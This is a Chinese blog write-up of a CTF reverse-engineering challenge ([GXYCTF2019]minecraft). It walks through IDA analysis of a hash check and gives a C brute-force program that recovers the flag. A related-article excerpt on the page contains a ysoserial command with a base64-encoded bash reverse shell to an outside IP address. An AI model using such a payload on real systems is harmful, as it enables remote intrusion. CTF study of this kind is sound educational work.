BUUCTF [GXYCTF2019]minecraft

最新推荐文章于 2023-03-15 20:09:42 发布
最新推荐文章于 2023-03-15 20:09:42 发布
阅读量917 收藏 2
点赞数
分类专栏: BUUCTF 文章标签: visual studio ide visualstudio
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53349587/article/details/122347542
版权

1.拿到文件,一共有exe文件和dll文件、lib文件三个文件

dll文件和lib文件不知道有什么用,所以先IDA打开exe文件:

里面有一个关键的函数String_to_long,对应的加密过程是在动态链接库里,所以我们用IDA打开dll文件,找到String_to_long这个函数:

第64行有一个"-------Checking-----",我们运行应用程序输入之后也会出现这个字符串,这也更加证实了这个函数为主函数。

2.分析函数:

 首先,我们知道a1是我们的输入,只需要分析对a1进行操作的函数,大致流程就是对我们输入的字符串先进行base64解密,然后每四个字符为一组,进行hash加密,与已知的值进行比较。

看一下hash函数:

 四个字符依次进入循环,综上,把上图的C语言复制粘贴,修改一下,然后爆破即可得到flag,写出爆破脚本:

#include<stdio.h> //编译预处理命令

unsigned int goal[10] = {0x6C43B2A7,0x7954FD91,0xA3E9532,0xB87B5156,0xDA847742,0x2395E7F3,0xA679D954,0xE1FAAFF7};//最终得到的hash值
unsigned int flag[10];//提前定义一个flag变量,类型为整数
char table[100];//定义爆破的变量
using namespace std;//使用C++标准库
int main()//选择爆破的范围
{
    int num = 0;
    for(int i='a';i<='z';i++)
    {
        table[num++] = i;
    }
    for(int i='A';i<='Z';i++)
    {
        table[num++] = i;
    }
    for(int i='0';i<='9';i++)
    {
        table[num++] = i;
    }
    table[num++] = '{';
    table[num++] = '}';
    table[num++] = '_';
    table[num++] = '-';
    for(int i=0;i<8;i++)//根据ida中的语句进行爆破
    {
        bool vis = 1;
        for(int n1=0;n1<num&&vis;n1++)
            for(int n2=0;n2<num&&vis;n2++)
                for(int n3=0;n3<num&&vis;n3++)
                    for(int n4=0;n4<num&&vis;n4++)
                    {
                        unsigned long long res = 0;
                        res ^= 0xC6A4A7935BD1E995LL * (((unsigned long long)(0xC6A4A7935BD1E995LL * table[n1]) >> 47) ^ 0xC6A4A7935BD1E995LL * table[n1]);
                        res *= 0xC6A4A7935BD1E995LL;
                        res += 0xE6546B64;

                        res ^= 0xC6A4A7935BD1E995LL * (((unsigned long long)(0xC6A4A7935BD1E995LL * table[n2]) >> 47) ^ 0xC6A4A7935BD1E995LL * table[n2]);
                        res *= 0xC6A4A7935BD1E995LL;
                        res += 0xE6546B64;

                        res ^= 0xC6A4A7935BD1E995LL * (((unsigned long long)(0xC6A4A7935BD1E995LL * table[n3]) >> 47) ^ 0xC6A4A7935BD1E995LL * table[n3]);
                        res *= 0xC6A4A7935BD1E995LL;
                        res += 0xE6546B64;

                        res ^= 0xC6A4A7935BD1E995LL * (((unsigned long long)(0xC6A4A7935BD1E995LL * table[n4]) >> 47) ^ 0xC6A4A7935BD1E995LL * table[n4]);
                        res *= 0xC6A4A7935BD1E995LL;
                        res += 0xE6546B64;
                        unsigned int res2 = (int)res;
                        if(res2 == goal[i])//与已知数值进行对比,相等则输出
                        {
                            vis = 0;
                            //printf("%d\n",i);
                            printf("%c%c%c%c",table[n1],table[n2],table[n3],table[n4]);
                        }
                    }
    }
    return 0;
}
/*

*a1 ^= 0xC6A4A7935BD1E995i64 * (((unsigned __int64)(0xC6A4A7935BD1E995i64 * a2) >> 47) ^ 0xC6A4A7935BD1E995i64 * a2);
*a1 *= 0xC6A4A7935BD1E995i64;
result = *a1 + 0xE6546B64i64;
*a1 = result;

*/

 运行得到:

R1hZe0lfaGF2ZV9ub19naXIxX2ZyaWVO 

base64解密:

最后两位为d},得到最终的flag:

flag{I_have_no_gir1_frieNd}

皮皮蟹!
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
青少年CTF-A1-Misc-MC大挑战01
m0_74866126的博客
11-17 344
在网上冲浪没找到这题的答案,无奈只有自己试试了,花了很多的时间对压缩包解压的文件进行搜索flag痕迹,但是没有有用的线索,所以做这个可不是直接能从出题人给的文件里找到flag。
CTF-Bugku-MISC-30
hahaHalsey的博客
09-08 1706
Bugku 杂项30道
[GXYCTF2019]minecraft
qq_37439229的博客
04-14 1224
*俺必须承认这道题出的蛮难的。。。。*它居然把主要程序放在他自己编写的dll里,不得不说还是蛮稀奇 首先打开ida 他说给了这个提示(有个屁用呀!!!!!!!!!!!!!!!!!!!!!,还不是要看它源码怎么写的) 调试进入string_t0_long这函数(当然也可以去看它的dll文件,反正都一样,我不过是喜欢看调试) 调试易得前面那一坨,只是进行了base64加密,这里就不演示了 同上易得,他...
[ACTF新生赛2020]Splendid_MineCraft 题解
于高山之巅,方见大河奔涌;于群峰之上,更觉长风浩荡。
03-15 547
buuctf-[ACTF新生赛2020]Splendid_MineCraft 题解
【Log4j2】VNCTF2022 misc-minecraft log4j反弹shell复现
qq_33834637的博客
04-25 4141
##POC hint mc的flag在/flag Misc mc :hint log4j jdk8u261 commons-collections-3.2.1.jar 使用ysoserial.jar生成反序列化数据 java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections6 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8yMDkuMTQxLjMyLjc3LzIzMjIzIDA+JjE=}|{base6
Minecraft 工作站 投影包
05-30
Minecraft 工作站 投影包Minecraft 工作站 投影包Minecraft 工作站 投影包Minecraft 工作站 投影包Minecraft 工作站 投影包Minecraft 工作站 投影包Minecraft 工作站 投影包Minecraft 工作站 投影包Minecraft 工作站...
Minecraft1.16.5-forge
02-18
Minecraft1.16.5-forge版本,可以添加mod,此版本mod在网页上容易搜索,所有推荐安装1.16.5版本 在我的世界服务端搭建专栏中服务端上传的同样为本版本
Minecraft 中型马厩 投影包
最新发布
05-30
Minecraft 中型马厩 投影包Minecraft 中型马厩 投影包Minecraft 中型马厩 投影包Minecraft 中型马厩 投影包Minecraft 中型马厩 投影包Minecraft 中型马厩 投影包Minecraft 中型马厩 投影包Minecraft 中型马厩 投影包...
Minecraft 老石板桥 投影包
05-30
Minecraft 老石板桥 投影包Minecraft 老石板桥 投影包Minecraft 老石板桥 投影包Minecraft 老石板桥 投影包Minecraft 老石板桥 投影包Minecraft 老石板桥 投影包Minecraft 老石板桥 投影包Minecraft 老石板桥 投影包...
Python-Minecraft.zip
07-28
运行前请先安装pyglet
[GXYCTF2019]禁止套娃
qq_42812036的博客
02-20 3664
0x00知识点 .git源码泄露 无参RCE localeconv() 函数返回一包含本地数字及货币格式信息的数组。 scandir() 列出 images 目录中的文件和目录。 readfile() 输出一个文件。 current() 返回数组中的当前单元, 默认取第一个值。 pos() current() 的别名。 next() 函数将内部指针指向数组中的下一个元素,并输出。 array...
[buuctf.reverse] 126-130
weixin_52640415的博客
06-26 525
126_[NPUCTF2020]EzObfus-Chapter2 128_[GKCTF 2021]app-debug 129_[FlareOn2]YUSoMeta 130_[GXYCTF2019]minecraft
spring学习(二 )aop
qq_37439229的博客
07-12 153
spring中基于aop的配置步骤 1.把通知bean交给spring管理 2.使用aop:config标签开始aop配置 3,使用aspect配置切面(id标志 ref通知类bean的id) 4.在aspect内部使用对应标签来配置通知类型(AOP:before method) 5.pointcut表示指定切入点表达式 写法: 关键字:execution 表达式: 访问修饰符 包明。。。类名。方法名 public void com.spring_learn,..... 全通配写法:* *..*.*(..)
buuctf Crackme6
qq_37439229的博客
05-16 672
这道题涉及的知识点说实话还是蛮多的。。。 首先是这里的加密 主要是看汇编,不难,yafu一下知道是[2,3,5,7,11,13,17,19,23] a = [2 , 3, 5, 7, 11 ,13,17,19,23] b = [0x33,0x21,0x22,0x21,0x35,0x7c,0x62,0x65,0x6e] for i in range(9): a[i] = a[i] +0x41 a[i] = a[i] ^b[i] "".join(chr(a[i]) for i in rang
GXYCTF2019 Writeup
qq_39642801的博客
12-26 1030
网上找了以下发现要找到writeup还是有些困难,码以下,比较友好的比赛。 writeup地址:https://15h3na0.xyz/2019/12/21/GXYCTF%20Writeup/?from=groupmessage&nsukey=lzvye6q%2FD%2Fd73PbgxMqA3t1DxnjpUe3yTT3gztom9yvT6aHP8oyN%2BWwMu6eAIJLKkr05...
ctf镜子里面的世界_我的世界:游戏为什么没有镜子,因为技术原因,mojang做不出来?...
weixin_39853155的博客
11-09 536
大家都知道,我的世界这款游戏可以说是非常的有趣了,在这款游戏之中,玩家们可以随意的搭建自己想要的内容,甚至是可以随意还原现实之中的很多内容,而在这款游戏当中,也有很多道具是和现实一模一样的。但是大家发现了没有,在我的世界之中,玩家们一直都没有镜子这种东西,没法在每天出门的时候照镜子,那么今天我们就来聊一下,为什么游戏中没有镜子呢?如果让小黄象自己去想的话,那么我给出的答案的话,可能就是有...
[ACTF新生赛2020]Splendid_MineCraft
m0_46296905的博客
04-22 852
题目:[ACTF新生赛2020]Splendid_MineCraft 32位无壳程序 初步静态分析 老样子,ida32进去看主函数。 有提示输入错误的字串,但没有提示输入正确的字串。 瞄了一眼流程图(发现有个突出的独立分支),引起了我的怀疑。 红框部分的细节如下: 原来那个提示正确的字串在这个独立分支上,光标放在红框,再按tab看伪代码,发现显示在主函数的这个区域。 在这个区域我们又找到意想不到的收获。 推测是smc没错了。 接下来具体分析主函数: strtok函数: 函数原型:char *
MineCraft - 杂项整理
weixin_34259232的博客
08-13 191
前言 本文将搜集在MC的游戏过程中有可能使用到的一些资料,包括但不限于:服务端各种插件权限列表、方块代号、附魔以及药水效果等。 本文内容均为链接,若发现有链接失效请及时提醒我进行更换 正文 我的世界中文WiKi MC方块ID MC颜色代码 药水效果:/effect 命令用法 效果ID wiki ...
ISCTF赛后总结
xiaf5的博客
10-24 2244
学了一个月的菜鸡,第一次打ctf比赛,感觉自己实在太菜了,总结总结经验。 Web 跟着队友混,队友Web贼强,Web全AK. CRYPTO 弯弯曲曲的路 不合格的pwn手竟然拿到密码题的一血。。。 题目描述:一只古典的蓝鲨从一条路的尽头上下上下上的走过了弯弯曲曲的小路上,并且经过了5棵树还有5个银行。 打开下载的文件,文件名为zip格式提示用zip格式打开解压缩。 根据题目描述,应该是5组,每组5个 分组后仔细观察,发现flag是交叉式的。 ISCTF{Welc0nne_..
Python Minecraft
05-08
Python Minecraft是一个基于Python编程语言的Minecraft游戏开发框架。使用Python Minecraft,开发者可以通过编写Python代码来创建和修改Minecraft游戏中的世界、角色、物品等。Python Minecraft提供了丰富的API,使得开发者能够自由地创造自己的游戏场景和玩法。 Python Minecraft最初是由一个名为"ScriptCraft"的项目发展而来,它是一个基于JavaScript的Minecraft Mod开发框架。而Python Minecraft则是在此基础上开发出来的一种新的方式,使用Python语言编写代码,实现类似的功能。 如果您想了解更多关于Python Minecraft的内容,可以访问官方网站"www.pythonminecraft.com"来获取更多信息。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值